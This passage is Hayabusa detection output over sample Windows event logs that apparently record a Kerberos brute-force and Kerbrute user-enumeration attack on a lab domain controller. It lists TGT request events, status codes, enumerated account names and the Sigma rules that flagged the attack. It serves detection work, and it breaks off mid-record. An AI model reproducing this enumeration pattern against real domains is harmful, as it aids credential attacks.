-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce 
with non existing users.evtx +2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_2f6964c8f421408ab/SM_374806bcc65140a5a/Administrator/DefaultAccount/krbtgt/Test-ADM/SM_8b9faa99d83446d1b/SM_6aaeeb113c0c4af3a/administrator/SM_25e3b4425ffd47aab/SM_957258b5879242afb/SM_27d255b6407743b08/SM_2b6f1a51ac6c41b2a/Guest/SM_b2a35e76f50a4c23a/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- +2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 
TargetUserName:svc-ata/svc_adfs01/HealthMailbox0ab31b3/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailbox9a2d0da/HealthMailboxf7e4358/adminupn42/vuln_scan/HealthMailboxe8b0d98/HealthMailboxdabf0a3/HealthMailboxc9291f7/proabcdef/HealthMailboxa935ecd/HealthMailboxeb3dc3f/HealthMailboxebdc745/domadm/admin-te/HealthMailboxa99e1bd/admin-hacker/svc_nxlog/Svc-SQL-DB01 IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- +2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: 
::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: 
vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.357 
+09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with 
non existing users.evtx +2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: 
::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT 
Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 
21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration 
(Kerbrute).evtx +2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: 
